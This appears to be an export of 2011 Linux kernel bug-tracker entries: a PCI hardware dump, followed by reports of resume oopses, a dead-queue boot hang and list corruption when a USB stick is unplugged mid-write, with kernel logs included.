WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable- ID=0 ArbSelect=Fixed TC/VC=00 Status: NegoPending- InProgress- Capabilities: [180 v1] Root Complex Link Desc: PortNumber=02 ComponentID=02 EltType=Config Link0: Desc: TargetPort=00 TargetComponent=02 AssocRCRB- LinkType=MemMapped LinkValid+ Addr: 00000000fed1c001 Kernel driver in use: pcieport Kernel modules: shpchp 00:1c.2 PCI bridge: Intel Corporation N10/ICH 7 Family PCI Express Port 3 (rev 02) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=04, subordinate=04, sec-latency=0 I/O behind bridge: 00003000-00003fff Memory behind bridge: f0200000-f02fffff Prefetchable memory behind bridge: 0000000080000000-00000000801fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [40] Express (v1) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s unlimited, L1 unlimited ExtTag- RBE- FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #3, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;256ns, L1 &lt;4us ClockPM- Surprise- LLActRep+ BwNot- LnkCtl: ASPM L0s L1 Enabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive+ BWMgmt- ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug+ Surprise+ Slot #4, PowerLimit 6.500W; Interlock- NoCompl- SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet+ CmdCplt- HPIrq- LinkChg- Control: AttnInd Unknown, PwrInd Unknown, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet+ Interlock- Changed: MRL- PresDet- LinkState- RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- Capabilities: [80] MSI: Enable+ Count=1/1 Maskable- 64bit- Address: fee0300c Data: 4161 Capabilities: [90] Subsystem: Intel Corporation Device 1999 Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [100 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed+ WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed+ WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=01 Status: NegoPending- InProgress- VC1: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed+ WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable- ID=0 ArbSelect=Fixed TC/VC=00 Status: NegoPending- InProgress- Capabilities: [180 v1] Root Complex Link Desc: PortNumber=03 ComponentID=02 EltType=Config Link0: Desc: TargetPort=00 TargetComponent=02 AssocRCRB- LinkType=MemMapped LinkValid+ Addr: 00000000fed1c001 Kernel driver in use: pcieport Kernel modules: shpchp 00:1d.0 USB Controller: Intel Corporation N10/ICH 7 Family USB UHCI Controller #1 (rev 02) (prog-if 00 [UHCI]) Subsystem: Lenovo Device 3807 Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Interrupt: pin A routed to IRQ 23 Region 4: I/O ports at 1820 [size=32] Kernel driver in use: uhci_hcd Kernel modules: uhci-hcd 00:1d.1 USB Controller: Intel Corporation N10/ICH 7 Family USB UHCI Controller #2 (rev 02) (prog-if 00 [UHCI]) Subsystem: Lenovo Device 3808 Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Interrupt: pin B routed to IRQ 19 Region 4: I/O ports at 1840 [size=32] Kernel driver in use: uhci_hcd Kernel modules: uhci-hcd 00:1d.2 USB Controller: Intel Corporation N10/ICH 7 Family USB UHCI Controller #3 (rev 02) (prog-if 00 [UHCI]) Subsystem: Lenovo Device 3809 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin C routed to IRQ 18 Region 4: I/O ports at 1860 [size=32] Kernel driver in use: uhci_hcd Kernel modules: uhci-hcd 00:1d.3 USB Controller: Intel Corporation N10/ICH 7 Family USB UHCI Controller #4 (rev 02) (prog-if 00 [UHCI]) Subsystem: Lenovo Device 380a Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin D routed to IRQ 16 Region 4: I/O ports at 1880 [size=32] Kernel driver in use: uhci_hcd Kernel modules: uhci-hcd 00:1d.7 USB Controller: Intel Corporation N10/ICH 7 Family USB2 EHCI Controller (rev 02) (prog-if 20 [EHCI]) Subsystem: Lenovo Device 380b Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 23 Region 0: Memory at f0644000 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Debug port: BAR=1 offset=00a0 Kernel driver in use: ehci_hcd Kernel modules: ehci-hcd 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev e2) (prog-if 01 [Subtractive decode]) Control: I/O- Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Bus: primary=00, secondary=05, subordinate=05, sec-latency=32 I/O behind bridge: 0000f000-00000fff Memory behind bridge: fff00000-000fffff Prefetchable memory behind bridge: 00000000fff00000-00000000000fffff Secondary status: 66MHz- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [50] Subsystem: Lenovo Device 380c 00:1f.0 ISA bridge: Intel Corporation 82801GBM (ICH7-M) LPC Interface Bridge (rev 02) Subsystem: Lenovo Device 380d Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Capabilities: [e0] Vendor Specific Information: Len=0c &lt;?&gt; Kernel modules: intel-rng, leds-ss4200, iTCO_wdt 00:1f.1 IDE interface: Intel Corporation 82801G (ICH7 Family) IDE Controller (rev 02) (prog-if 8a [Master SecP PriP]) Subsystem: Lenovo Device 3810 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx+ Latency: 0 Interrupt: pin B routed to IRQ 19 Region 0: I/O ports at 01f0 [size=8] Region 1: I/O ports at 03f4 [size=1] Region 2: I/O ports at 0170 [size=8] Region 3: I/O ports at 0374 [size=1] Region 4: I/O ports at 1810 [size=16] Kernel driver in use: ata_piix Kernel modules: piix, ata_piix 00:1f.2 IDE interface: Intel Corporation 82801GBM/GHM (ICH7 Family) SATA IDE Controller (rev 02) (prog-if 8f [Master SecP SecO PriP PriO]) Subsystem: Lenovo Device 3835 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin B routed to IRQ 19 Region 0: I/O ports at 18c8 [size=8] Region 1: I/O ports at 18c0 [size=4] Region 2: I/O ports at 18a8 [size=8] Region 3: I/O ports at 180c [size=4] Region 4: I/O ports at 18b0 [size=16] Region 5: Memory at f0644400 (32-bit, non-prefetchable) [size=1K] Capabilities: [70] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold-) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: ata_piix Kernel modules: ata_piix 00:1f.3 SMBus: Intel Corporation N10/ICH 7 Family SMBus Controller (rev 02) Subsystem: Lenovo Device 380f Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Interrupt: pin B routed to IRQ 19 Region 4: I/O ports at 18e0 [size=32] Kernel driver in use: i801_smbus Kernel modules: i2c-i801 02:00.0 Ethernet controller: Broadcom Corporation NetLink BCM5906M Fast Ethernet PCI Express (rev 02) Subsystem: Lenovo IdeaPad S10e Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 44 Region 0: Memory at f0100000 (64-bit, non-prefetchable) [size=64K] Expansion ROM at &lt;ignored&gt; [disabled] Capabilities: [48] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst+ PME-Enable- DSel=0 DScale=0 PME- Capabilities: [50] Vital Product Data End Capabilities: [58] Vendor Specific Information: Len=78 &lt;?&gt; Capabilities: [e8] MSI: Enable+ Count=1/1 Maskable- 64bit+ Address: 00000000fee0300c Data: 4199 Capabilities: [d0] Express (v1) Endpoint, MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;4us, L1 unlimited ExtTag+ AttnBtn- AttnInd- PwrInd- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 4096 bytes DevSta: CorrErr+ UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #0, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;4us, L1 &lt;64us ClockPM+ Surprise- LLActRep- BwNot- LnkCtl: ASPM L0s L1 Enabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM+ AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- Capabilities: [100 v1] Advanced Error Reporting UESta: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq+ ACSViol- UEMsk: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq- ACSViol- UESvrt: DLP+ SDES+ TLP- FCP+ CmpltTO- CmpltAbrt- UnxCmplt- RxOF+ MalfTLP+ ECRC- UnsupReq- ACSViol- CESta: RxErr+ BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr+ CEMsk: RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr+ AERCap: First Error Pointer: 14, GenCap+ CGenEn- ChkCap+ ChkEn- Capabilities: [13c v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed- WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed- WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=01 Status: NegoPending- InProgress- Capabilities: [160 v1] Device Serial Number 00-23-8b-ff-fe-40-d5-e4 Kernel driver in use: tg3 Kernel modules: tg3 04:00.0 Network controller: Broadcom Corporation BCM4312 802.11b/g LP-PHY (rev 01) Subsystem: Broadcom Corporation Device 04b5 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 18 Region 0: Memory at f0200000 (64-bit, non-prefetchable) [size=16K] Capabilities: [40] Power Management version 3 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst+ PME-Enable- DSel=0 DScale=2 PME- Capabilities: [58] Vendor Specific Information: Len=78 &lt;?&gt; Capabilities: [e8] MSI: Enable- Count=1/1 Maskable- 64bit+ Address: 0000000000000000 Data: 0000 Capabilities: [d0] Express (v1) Endpoint, MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;4us, L1 unlimited ExtTag+ AttnBtn- AttnInd- PwrInd- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr+ UncorrErr+ FatalErr- UnsuppReq+ AuxPwr- TransPend- LnkCap: Port #0, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;4us, L1 &lt;64us ClockPM+ Surprise- LLActRep- BwNot- LnkCtl: ASPM L0s L1 Enabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM+ AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- Capabilities: [100 v1] Advanced Error Reporting UESta: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq+ ACSViol- UEMsk: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq- ACSViol- UESvrt: DLP+ SDES- TLP- FCP+ CmpltTO- CmpltAbrt- UnxCmplt- RxOF+ MalfTLP+ ECRC- UnsupReq- ACSViol- CESta: RxErr+ BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr+ CEMsk: RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr+ AERCap: First Error Pointer: 14, GenCap+ CGenEn- ChkCap+ ChkEn- Capabilities: [13c v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed- WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed- WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=01 Status: NegoPending- InProgress- Capabilities: [160 v1] Device Serial Number 2e-19-00-ff-ff-91-00-21 Capabilities: [16c v1] Power Budgeting &lt;?&gt; Kernel driver in use: b43-pci-bridge Kernel modules: ssb Thank you and please let me know if i can provide more info to debug. Regards, Mark</t>
  </si>
  <si>
    <t>Oops on resume enabling CPU1, setup_disablecpuid</t>
  </si>
  <si>
    <t>2011-05-22 13:23 UTC</t>
  </si>
  <si>
    <t>Jukka Ollila</t>
  </si>
  <si>
    <t>2011-05-24 11:54 UTC</t>
  </si>
  <si>
    <t>Kernel 2.6.39 reliably oopses on resume from suspend. The system resumes and is usable but one of the cores is missing. The machine is an Acer Ferrari 1000 laptop, dual-core amd64 This didn't happen in 2.6.39-rc2, haven't bisected it yet. Kernel log snippet below in case the problem's obvious to someone. I can try patches or provide additional info on request. May 22 14:26:30 monza kernel: [ 80.218559] ACPI: Low-level resume complete May 22 14:26:30 monza kernel: [ 80.218559] PM: Restoring platform NVS memory May 22 14:26:30 monza kernel: [ 80.218559] Enabling non-boot CPUs ... May 22 14:26:30 monza kernel: [ 80.230864] Booting Node 0 Processor 1 APIC 0x1 May 22 14:26:30 monza kernel: [ 80.230867] smpboot cpu 1: start_ip = 98000 May 22 14:26:30 monza kernel: [ 80.217599] kernel tried to execute NX-protected page - exploit attempt? (uid: 0) May 22 14:26:30 monza kernel: [ 80.217599] BUG: unable to handle kernel paging request at ffffffff815b8c59 May 22 14:26:30 monza kernel: [ 80.217599] IP: [&lt;ffffffff815b8c59&gt;] setup_disablecpuid+0x43/0x43 May 22 14:26:30 monza kernel: [ 80.217599] PGD 1549067 PUD 154d063 PMD 6c31c063 PTE 80000000015b8163 May 22 14:26:30 monza kernel: [ 80.217599] Oops: 0011 [#1] PREEMPT SMP May 22 14:26:30 monza kernel: [ 80.217599] CPU 1 May 22 14:26:30 monza kernel: [ 80.217599] Modules linked in: cpufreq_stats cpufreq_conservative cpufreq_userspace cpufreq_powersave cpufreq_ondemand ipv6 bluetooth uinput fuse powernow_k8 freq_table mperf firewire_sbp2 loop radeon ttm snd_hda_codec_realtek joydev snd_hda_intel snd_hda_codec snd_hwdep drm_kms_helper drm snd_pcm pcmcia snd_seq snd_timer snd_seq_device snd irda yenta_socket i2c_piix4 pcmcia_rsrc i2c_algo_bit processor ac container psmouse battery acer_wmi evdev serio_raw sparse_keymap pcspkr k8temp i2c_core crc_ccitt button soundcore rfkill snd_page_alloc pcmcia_core wmi ext3 jbd mbcache usbhid hid sd_mod ohci_hcd ata_generic sata_sil thermal libata tg3 firewire_ohci firewire_core crc_itu_t libphy scsi_mod ehci_hcd [last unloaded: scsi_wait_scan] May 22 14:26:30 monza kernel: [ 80.217599] May 22 14:26:30 monza kernel: [ 80.217599] Pid: 0, comm: kworker/0:0 Not tainted 2.6.39+ #2 Acer, inc. Ferrari 1000 /Ferrari6 May 22 14:26:30 monza kernel: [ 80.217599] RIP: 0010:[&lt;ffffffff815b8c59&gt;] [&lt;ffffffff815b8c59&gt;] setup_disablecpuid+0x43/0x43 May 22 14:26:30 monza kernel: [ 80.217599] RSP: 0000:ffff88006fbb7f10 EFLAGS: 00010012 May 22 14:26:30 monza kernel: [ 80.217599] RAX: 0000000000040f82 RBX: 0000000000000001 RCX: 0000000000002001 May 22 14:26:30 monza kernel: [ 80.217599] RDX: 00000000178bfbff RSI: ffffffff813a95b4 RDI: ffff88006fd11380 May 22 14:26:30 monza kernel: [ 80.217599] RBP: ffff88006fd11380 R08: 000000008000000a R09: 0000000000000001 May 22 14:26:30 monza kernel: [ 80.217599] R10: 0000000000000000 R11: 0000000000000000 R12: ffff88006fd11394 May 22 14:26:30 monza kernel: [ 80.217599] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000 May 22 14:26:30 monza kernel: [ 80.217599] FS: 0000000000000000(0000) GS:ffff88006fd00000(0000) knlGS:0000000000000000 May 22 14:26:30 monza kernel: [ 80.217599] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b May 22 14:26:30 monza kernel: [ 80.217599] CR2: ffffffff815b8c59 CR3: 0000000001547000 CR4: 00000000000006a0 May 22 14:26:30 monza kernel: [ 80.217599] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 May 22 14:26:30 monza kernel: [ 80.217599] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 May 22 14:26:30 monza kernel: [ 80.217599] Process kworker/0:0 (pid: 0, threadinfo ffff88006fbb6000, task ffff88006fb5e450) May 22 14:26:30 monza kernel: [ 80.217599] Stack: May 22 14:26:30 monza kernel: [ 80.217599] ffffffff812a1073 0000000000000001 0000000000000000 0000000000000000 May 22 14:26:30 monza kernel: [ 80.217599] ffffffff812a1282 0000000000000000 ffffffff812a3d0d 000000000000059f May 22 14:26:30 monza kernel: [ 80.217599] 0000000000000000 0000000000000000 0000000000000000 0000000000000000 May 22 14:26:30 monza kernel: [ 80.217599] Call Trace: May 22 14:26:30 monza kernel: [ 80.217599] [&lt;ffffffff812a1073&gt;] ? identify_cpu+0xb4/0x2af May 22 14:26:30 monza kernel: [ 80.217599] [&lt;ffffffff812a1282&gt;] ? identify_secondary_cpu+0x14/0x1d May 22 14:26:30 monza kernel: [ 80.217599] [&lt;ffffffff812a3d0d&gt;] ? start_secondary+0x107/0x188 May 22 14:26:30 monza kernel: [ 80.217599] Code: ff 85 c0 0f 89 3a ff ff ff 48 8b 3d ca 38 20 00 e8 bd a4 ff ff 48 c7 05 ba 38 20 00 00 00 00 00 83 c8 ff e9 35 ff ff ff 66 2e 0f &lt;1f&gt; 84 00 00 00 00 00 e8 5b a4 ff ff 83 38 0b 0f 95 c0 0f b6 c0 May 22 14:26:30 monza kernel: [ 80.217599] RIP [&lt;ffffffff815b8c59&gt;] setup_disablecpuid+0x43/0x43 May 22 14:26:30 monza kernel: [ 80.217599] RSP &lt;ffff88006fbb7f10&gt; May 22 14:26:30 monza kernel: [ 80.217599] CR2: ffffffff815b8c59 May 22 14:26:30 monza kernel: [ 80.217599] ---[ end trace 0cda1761d71a2783 ]--- May 22 14:26:30 monza kernel: [ 80.217599] Kernel panic - not syncing: Attempted to kill the idle task! May 22 14:26:30 monza kernel: [ 80.217599] Pid: 0, comm: kworker/0:0 Tainted: G D 2.6.39+ #2 May 22 14:26:30 monza kernel: [ 80.217599] Call Trace: May 22 14:26:30 monza kernel: [ 80.217599] [&lt;ffffffff812a718b&gt;] ? panic+0xa1/0x1aa May 22 14:26:30 monza kernel: [ 80.217599] [&lt;ffffffff81039b91&gt;] ? do_exit+0xa8/0x718 May 22 14:26:30 monza kernel: [ 80.217599] [&lt;ffffffff81038170&gt;] ? kmsg_dump+0x84/0xd4 May 22 14:26:30 monza kernel: [ 80.217599] [&lt;ffffffff81005362&gt;] ? oops_end+0xa9/0xae May 22 14:26:30 monza kernel: [ 80.217599] [&lt;ffffffff815b8c59&gt;] ? setup_disablecpuid+0x43/0x43 May 22 14:26:30 monza kernel: [ 80.217599] [&lt;ffffffff8102356b&gt;] ? no_context+0x1ed/0x1fa May 22 14:26:30 monza kernel: [ 80.217599] [&lt;ffffffff815b8c59&gt;] ? setup_disablecpuid+0x43/0x43 May 22 14:26:30 monza kernel: [ 80.217599] [&lt;ffffffff81023a42&gt;] ? do_page_fault+0x152/0x348 May 22 14:26:30 monza kernel: [ 80.217599] [&lt;ffffffff812a99f9&gt;] ? _raw_spin_unlock_irq+0x11/0x30 May 22 14:26:30 monza kernel: [ 80.217599] [&lt;ffffffff8102d293&gt;] ? finish_task_switch+0x42/0x91 May 22 14:26:30 monza kernel: [ 80.217599] [&lt;ffffffff812a7d3f&gt;] ? schedule+0x74d/0x833 May 22 14:26:30 monza kernel: [ 80.217599] [&lt;ffffffff812a9f8f&gt;] ? page_fault+0x1f/0x30 May 22 14:26:30 monza kernel: [ 80.217599] [&lt;ffffffff815b8c59&gt;] ? setup_disablecpuid+0x43/0x43 May 22 14:26:30 monza kernel: [ 80.217599] [&lt;ffffffff812a1073&gt;] ? identify_cpu+0xb4/0x2af May 22 14:26:30 monza kernel: [ 80.217599] [&lt;ffffffff812a1282&gt;] ? identify_secondary_cpu+0x14/0x1d May 22 14:26:30 monza kernel: [ 80.217599] [&lt;ffffffff812a3d0d&gt;] ? start_secondary+0x107/0x188 May 22 14:26:30 monza kernel: [ 85.287094] CPU1: Stuck ?? May 22 14:26:30 monza kernel: [ 85.287162] Error taking CPU1 up: -5</t>
  </si>
  <si>
    <t>On resume, I sometimes get a kernel oops with led_trigger_unregister_simple</t>
  </si>
  <si>
    <t>2011-05-23 00:15 UTC</t>
  </si>
  <si>
    <t>Sven-Hendrik Haase</t>
  </si>
  <si>
    <t>2016-02-22 04:11 UTC</t>
  </si>
  <si>
    <t>Created attachment 59042 [details] relevant kernel.log section On kernel 2.6.39, I sometimes get the attached oops during resume. The log I attached contains the complete sleep-resume cycle and as you can see, I'm suspending into memory. I'm certainly no kernel hacker but from what the trace lets me guess, conky (which also tries to get battery level for me) explodes the kernel on resume since it can't find a battery? My battery is usually not inserted. It appears to be a regression as I cannot remember seeing this in 2.6.28 or earlier. Relevant system info and software: software: conky, kde4, kde4 battery monitor uname -a: Linux smith 2.6.39-ARCH #1 SMP PREEMPT Fri May 20 11:33:59 CEST 2011 x86_64 Intel(R) Core(TM)2 Duo CPU T7300 @ 2.00GHz GenuineIntel GNU/Linux distro: Arch Linux x86_64</t>
  </si>
  <si>
    <t>killing requests for dead queue</t>
  </si>
  <si>
    <t>2011-05-23 10:34 UTC</t>
  </si>
  <si>
    <t>Zbigniew</t>
  </si>
  <si>
    <t>2012-05-12 13:41 UTC</t>
  </si>
  <si>
    <t>When yesterday booted newly compiled 2.6.39 kernel up - directly after the compilation - there wasn't anything bad. But today in the morning system was unable to complete boot-up, staying at the message: "sde: killing requests for dead queue". Maybe new kernel doesn't like my USB card reader? "cat /proc/scsi/scsi" shows: Attached devices: Host: scsi0 Channel: 00 Id: 00 Lun: 00 Vendor: ATA Model: STM3320418AS Rev: CC38 Type: Direct-Access ANSI SCSI revision: 05 Host: scsi2 Channel: 00 Id: 00 Lun: 00 Vendor: HL-DT-ST Model: DVD-RAM GH22LS30 Rev: 1.01 Type: CD-ROM ANSI SCSI revision: 05 Host: scsi4 Channel: 00 Id: 00 Lun: 00 Vendor: Generic Model: USB SD Reader Rev: 1.00 Type: Direct-Access ANSI SCSI revision: 00 Host: scsi4 Channel: 00 Id: 00 Lun: 01 Vendor: Generic Model: USB CF Reader Rev: 1.01 Type: Direct-Access ANSI SCSI revision: 00 Host: scsi4 Channel: 00 Id: 00 Lun: 02 Vendor: Generic Model: USB SM Reader Rev: 1.02 Type: Direct-Access ANSI SCSI revision: 00 Host: scsi4 Channel: 00 Id: 00 Lun: 03 Vendor: Generic Model: USB MS Reader Rev: 1.03 Type: Direct-Access ANSI SCSI revision: 00 No memory cards neither USB sticks were inserted during boot-up. It seems, that issue discussed in the thread, which I've found at: https://lkml.org/lkml/2011/4/11/175 ...still hasn't been resolved. Well, at least not completely.</t>
  </si>
  <si>
    <t>list_add corruption if usb-stick unplugged in the middle of write</t>
  </si>
  <si>
    <t>2011-05-23 16:22 UTC</t>
  </si>
  <si>
    <t>Created attachment 59112 [details] dmesg output with corruption warning System is Fedora 14 x86_64 with vanilla 2.6.39 kernel compiled from sources. Overview: A memory corruption can be triggered when a USB stick is disconnected or unplugged (by accident or deliberately) in the middle of a long write to that USB stick. Steps to reproduce: 1) Mount a vfat-formatted USB stick (I don't think the filesystem matters but it is what I used to reproduce). 2) Start a large write to the stick (a few hundred mb). 3) Wait until actual I/O starts in the USB stick 4) Yank out the USB stick while I/O still in progress. Actual results: The following message appears in the dmesg output, twice: list_add corruption. next-&gt;prev should be prev (ffff8801371e7370), but was ffffffff81a36db8. 